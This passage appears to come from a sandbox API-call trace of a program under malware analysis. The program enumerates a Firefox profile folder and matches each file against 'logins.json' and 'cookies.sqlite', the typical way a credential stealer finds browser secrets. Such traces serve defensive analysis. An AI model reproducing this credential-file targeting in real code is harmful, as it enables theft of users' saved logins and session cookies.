ftLastWriteTime.dwLowDateTime=0xb639bd10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0161.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.205] lstrlenW (lpString="\\") returned 1 [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.205] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925780 [0161.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" [0161.205] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.206] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="logins.json") returned 0x0 [0161.206] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.206] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.206] GetProcessHeap () returned 0x8e0000 [0161.206] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.206] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ad4bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5ad4bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x83256a10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0161.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.206] lstrlenW (lpString="\\") returned 1 [0161.206] GetProcessHeap () returned 0x8e0000 [0161.206] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.206] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.206] lstrlenW (lpString="cookies.sqlite") returned 14 [0161.206] GetProcessHeap () returned 0x8e0000 [0161.206] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.206] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" [0161.206] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.206] GetProcessHeap () returned 0x8e0000 [0161.206] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.206] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="logins.json") returned 0x0 [0161.206] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="cookies.sqlite") returned="cookies.sqlite" [0161.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 102 [0161.206] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x8fce90, Length=0xcc) returned 0x856f9ece [0161.206] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.206] GetProcessHeap () returned 0x8e0000 [0161.206] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.206] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc374ed0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbc374ed0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbc555e20, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="downloads.sqlite", cAlternateFileName="DOWNLO~1.SQL")) returned 1 [0161.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.206] lstrlenW (lpString="\\") returned 1 [0161.206] GetProcessHeap () returned 0x8e0000 [0161.206] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.207] lstrlenW (lpString="downloads.sqlite") returned 16 [0161.207] GetProcessHeap () returned 0x8e0000 [0161.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925780 [0161.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="downloads.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" [0161.207] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.207] GetProcessHeap () returned 0x8e0000 [0161.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="logins.json") returned 0x0 [0161.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.207] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.207] GetProcessHeap () returned 0x8e0000 [0161.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.207] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4b81e50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4b81e50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b81e50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.ini", cAlternateFileName="EXTENS~1.INI")) returned 1 [0161.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.207] lstrlenW (lpString="\\") returned 1 [0161.207] GetProcessHeap () returned 0x8e0000 [0161.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.207] lstrlenW (lpString="extensions.ini") returned 14 [0161.207] GetProcessHeap () returned 0x8e0000 [0161.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" [0161.207] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.207] GetProcessHeap () returned 0x8e0000 [0161.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="logins.json") returned 0x0 [0161.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.207] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.208] GetProcessHeap () returned 0x8e0000 [0161.208] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.208] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb45b48b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb45b48b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b0fa30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x70000, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.sqlite", cAlternateFileName="EXTENS~1.SQL")) returned 1 [0161.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.208] lstrlenW (lpString="\\") returned 1 [0161.208] GetProcessHeap () returned 0x8e0000 [0161.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.208] lstrlenW (lpString="extensions.sqlite") returned 17 [0161.208] GetProcessHeap () returned 0x8e0000 [0161.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925780 [0161.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" [0161.208] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.208] GetProcessHeap () returned 0x8e0000 [0161.208] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.208] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="logins.json") returned 0x0 [0161.208] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.208] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.208] GetProcessHeap () returned 0x8e0000 [0161.208] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.208] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="indexedDB", cAlternateFileName="INDEXE~1")) returned 1 [0161.208] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0161.208] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0161.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.208] lstrlenW (lpString="\\") returned 1 [0161.208] GetProcessHeap () returned 0x8e0000 [0161.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.209] lstrlenW (lpString="indexedDB") returned 9 [0161.209] GetProcessHeap () returned 0x8e0000 [0161.209] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925780 [0161.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.209] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.209] GetProcessHeap () returned 0x8e0000 [0161.209] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.209] lstrlenW (lpString="") returned 0 [0161.209] GetProcessHeap () returned 0x8e0000 [0161.209] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925850 [0161.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 